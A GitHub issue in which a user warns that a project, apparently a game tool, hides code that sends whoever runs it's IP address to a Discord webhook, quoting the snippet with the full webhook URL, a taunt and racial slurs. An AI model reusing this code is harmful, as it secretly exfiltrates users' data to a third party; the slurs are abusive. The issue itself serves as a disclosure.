Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

guys this may pwn you, stay safe #2

Open
WhundAlt opened this issue Nov 8, 2024 · 1 comment
Open

guys this may pwn you, stay safe #2

WhundAlt opened this issue Nov 8, 2024 · 1 comment

Comments

@WhundAlt
Copy link

WhundAlt commented Nov 8, 2024

result = f'--- Some n#gga fell for the trap --- \n{format(ip_response.text)}\n By: starting server xd'

webhook = requests.get('https://discord.com/api/webhooks/1138524574011641987/_PgTNrcjwz94lwBA7NisbkFH0vu8ysES2R1KaD1ba8t_pzBSfCVx2asme1fj4SRJ3EVs')

webhhok_info = f'--- Webhook info ---\n{format(webhook.text)}'

data = {
    'content': result,
    'username': 'Web-N#gga'
}

headers = {
    'Content-Type': 'application/json'
}

IdiotReadThisBeforeSpamming = "I got your ip. the damage has been done"
discord_response = requests.post('https://discord.com/api/webhooks/1138524574011641987/_PgTNrcjwz94lwBA7NisbkFH0vu8ysES2R1KaD1ba8t_pzBSfCVx2asme1fj4SRJ3EVs', data=json.dumps(data), headers=headers)

uhh

@WhundAlt WhundAlt changed the title what does this mean? guys this may pwn you, stay safe Nov 8, 2024
@WhundAlt
Copy link
Author

WhundAlt commented Nov 9, 2024

if you wanna use a safer version, use mine https://github.com/WhundAlt/Safe-Better-Brawl

it has removed webhooks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant